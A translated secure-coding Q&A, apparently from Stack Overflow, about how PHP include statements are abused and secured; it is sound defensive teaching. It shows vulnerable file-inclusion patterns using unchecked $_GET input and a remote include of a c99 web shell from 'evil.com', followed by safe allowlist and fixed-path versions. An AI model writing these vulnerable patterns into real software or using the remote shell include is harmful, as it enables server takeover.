我正在使用"include"函数(ex"include'head2.php'"或"include'class.users.php'")在我的网站中添加标题或会话类.我真的不记得在哪里,但我听说黑客滥用,不知何故,这个"包含"的东西,发送虚假的包含页面或类似的东西.所以基本上我想知道什么是"包含"功能,我该如何保护它,它们如何滥用它以及是否有更好的解决方案来满足我的需求.
提前致谢.
Law*_*one 15
这一切都取决于你如何实现它.如果您专门设置路径,那么它是安全的.如果允许用户输入确定文件路径而不进行清理或检查,则可能发生攻击.
不安全(目录遍历)
<?php
include($_GET['file']);
?>
不安全(URL fopen - 如果启用)
<?php
include('http://evil.com/c99shell.php');
?>
不安全
<?php
include('./some_dir/' . $_GET['file']);
?>
部分不安全(*.php文件易受攻击)
<?php
include('./some_dir/' . $_GET['file'] . '.php');
?>
安全(虽然不确定为什么有人会这样做.)
<?php
$allowed = array(
'somefile.php',
'someotherfile.php'
);
if (in_array(basename($_GET['file']), $allowed)) {
include('./includes/' . basename($_GET['file']));
}
?>
安全
<?php
include('./includes/somefile.php');
?>